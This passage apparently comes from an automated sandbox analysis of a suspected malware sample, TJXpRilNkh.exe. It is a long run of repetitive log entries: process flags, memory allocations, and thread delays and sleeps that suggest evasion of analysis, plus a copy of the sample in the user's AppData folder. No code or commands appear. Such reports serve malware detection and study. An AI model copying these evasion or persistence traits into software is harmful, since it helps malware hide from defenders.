                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeMemory allocated: D40000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeMemory allocated: 1A850000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeMemory allocated: 840000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeMemory allocated: 1A5A0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeMemory allocated: EF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeMemory allocated: 1ACB0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeMemory allocated: C90000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeMemory allocated: 1A7F0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeMemory allocated: F60000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeMemory allocated: 1AB20000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 599891Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 599672Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 599563Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 599438Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 599313Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 599203Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 599090Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 598985Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 598875Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 598766Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 598641Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 598531Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 598394Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 598266Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 598155Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 598020Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 597891Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 597766Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 597657Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 597532Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 597375Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 597265Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 597157Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 597046Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 596938Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 596828Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 596719Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 596610Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 596485Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 596360Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 596235Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 596110Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 595985Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 595735Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 595572Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 595460Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 595341Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 595215Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 595109Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 595000Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 594891Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 594782Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 594657Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 594532Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 594407Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 594297Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeThread delayed: delay time: 594188Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\TJXpRilNkh.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeWindow / User API: threadDelayed 2144Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exeWindow / User API: threadDelayed 7653Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5222Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4549Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7346Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2230Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7304Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2214Jump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -34126476536362649s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -599891s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -599781s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -599672s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -599563s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -599438s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -599313s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -599203s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -599090s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -598985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -598875s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -598766s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -598641s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -598531s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -598394s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -598266s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -598155s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -598020s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -597891s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -597766s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -597657s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -597532s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -597375s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -597265s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -597157s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -597046s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -596938s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -596828s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -596719s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -596610s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -596485s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -596360s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -596235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -596110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -595985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -595860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\TJXpRilNkh.exe TID: 1644Thread sleep time: -595735s >= -30000sJump to behavior
